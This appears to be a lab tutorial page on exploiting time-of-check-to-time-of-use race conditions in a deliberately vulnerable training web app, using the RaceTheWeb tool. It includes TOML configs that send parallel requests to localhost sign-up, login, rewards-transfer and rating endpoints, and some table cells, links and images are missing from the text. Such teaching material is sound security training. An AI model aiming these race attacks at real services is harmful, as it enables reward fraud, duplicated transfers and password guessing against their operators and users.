# More Tools ![](https://774439876-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MFm3n1MOvAFn50v_dX2%2F-MQTO5mIOWvpeDkAdbRI%2F-MQTPVUo0hYxC2iP9tuI%2Fimage.png?alt=media\&token=f418d82e-5868-4052-bd3f-aa8ae607e6c2) Using a tool can help you find and exploit TOCTOU issues. There are a couple of such tools available in the open-source world: | Name | Notes | | ----------------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | Browser Dev Tools | | | cURL | | We will solve the last challenge using RaceTheWeb. The executable files for RaceTheWeb can be obtained from Which version to download? It depends on the operating-system you are running | **Operating System** | **FIle to be downloaded** | | -------------------- | ---------------------------------- | | Linux 32-bit | race-the-web\_2.0.1\_lin32.bin | | Linux 64-bit | race-the-web\_2.0.1\_lin64.bin | | macOS 32-bit | race-the-web\_2.0.1\_osx32.app.zip | | macOS 64-bit | race-the-web\_2.0.1\_osx64.app.zip | | Windows 32-bit | race-the-web\_2.0.1\_win32.exe | | Windows 64-bit | race-the-web\_2.0.1\_win64.exe | On Linux and macOS machines, you need to make the file executable. | **Operating System** | **Command to run on Terminal** | | ---------------------------------- | ------------------------------------------------------------------------- | | race-the-web\_2.0.1\_lin32.bin | chmod +x race-the-web\_2.0.1\_lin32.bin | | race-the-web\_2.0.1\_lin64.bin | chmod +x race-the-web\_2.0.1\_lin64.bin | | race-the-web\_2.0.1\_osx32.app.zip |

Extract the zip file

chmod +x race-the-web\_2.0.1\_osx32.app

| | race-the-web\_2.0.1\_osx64.app.zip |

Extract the zip file

chmod +x race-the-web\_2.0.1\_osx64.app

| Running RacetheWeb is easy: 1. Open command prompt/Terminal 2. Navigate to the directory where you have extracted/downloaded the executable binary file 3. Run the following command: !\[A screenshot of a social media post Description automatically generated]\() **race-the-web** portion: Depending on the operating-system you are using, the race-the-web portion needs to be changed. | **Operating System** | **race-the-web portion** | | -------------------- | -------------------------------- | | Linux 32-bit | ./race-the-web\_2.0.1\_lin32.bin | | Linux 64-bit | ./race-the-web\_2.0.1\_lin64.bin | | macOS 32-bit | ./race-the-web\_2.0.1\_osx32.app | | macOS 64-bit | ./race-the-web\_2.0.1\_osx64.app | | Windows 32-bit | race-the-web\_2.0.1\_win32.exe | | Windows 64-bit | race-the-web\_2.0.1\_win64.exe | **\ portion:** TOML stands for Tom’s Obvious Minimal Language. The TOML file supplied should be having the request details so that race-the-web can run them. Find TOML file for some of the TimeGap Theory challenges below: ### Sign Up page ``` # Sign Up count = 10 verbose = false [[requests]] method = "POST" url = "http://localhost/timegaptheory/webapp/sign-up.php" body = "firstname=tom&password=tom&email=tom%40example.com&rewards=100" ``` In the above TOML file: * Count defines how many requests RaceTheWeb tools would be sending in parallel * Verbose defines the verbosity level of output that is displayed on the screen. The value of this can either be true or false * Method defines the type of the request. This can be GET, POST, PUT, DELETE etc. * URL is, well, the url at which request needs to be sent * Body of the request. You can skip this part if there is no body that needs to be submitted ### Sign In page ``` # Sign In Page count = 1 verbose = true [[requests]] method = "POST" url = "http://localhost/timegaptheory/webapp/login.php" body = "email=tom%40sechow.com&password=1234&submit=Submit" [[requests]] method = "POST" url = "http://localhost/timegaptheory/webapp/login.php" body = "email=tom%40sechow.com&password=password&submit=Submit" [[requests]] method = "POST" url = "http://localhost/timegaptheory/webapp/login.php" body = "email=tom%40sechow.com&password=tom&submit=Submit" ``` In the above TOML file: * Count is 1. However, there are three requests in the file. As such, RaceTheWeb tool will send three parallel requests * First two requests have wrong password in the request body ### Transfer rewards page ``` # Transfer Rewards count = 10 verbose = false [[requests]] method = "POST" url = "http://localhost/timegaptheory/webapp/user/transfer-rewards.php" body = "from=tom%40sechow.com&to=jerry%40sechow.com&amount=100&submit=Submit" ``` ### Ratings page ``` # Ratings page count = 1 verbose = false [[requests]] method = "POST" url = "http://localhost/timegaptheory/webapp/user/rate-the-program.php" body = "token=ae13e0f1df6412dc4b9e2a9a3354320b6c1f3a65160bcffb552495759870afa3" cookies = ["PHPSESSID=80c3ffddbfe4771dd408b3c53d4a7a44"] [[requests]] method = "POST" url = "http://localhost/timegaptheory/webapp/user/rate-the-program.php" body = "token=bc5091b2f60da51d203a58b2af1c8bd99a443751adb206814d22df79e335a3e5" cookies = ["PHPSESSID=fab00a2f7f46e33bb57deb4e08153e52"] ``` In the above TOML file, we are sending a cookie as well. Now you know: 1. Various open-source tools and techniques for finding and exploiting TOCTOU security issues 2. How to use RaceTheWeb tool for exploiting TOCTOU security issues 3. Writing TOML files for RaceTheWeb tool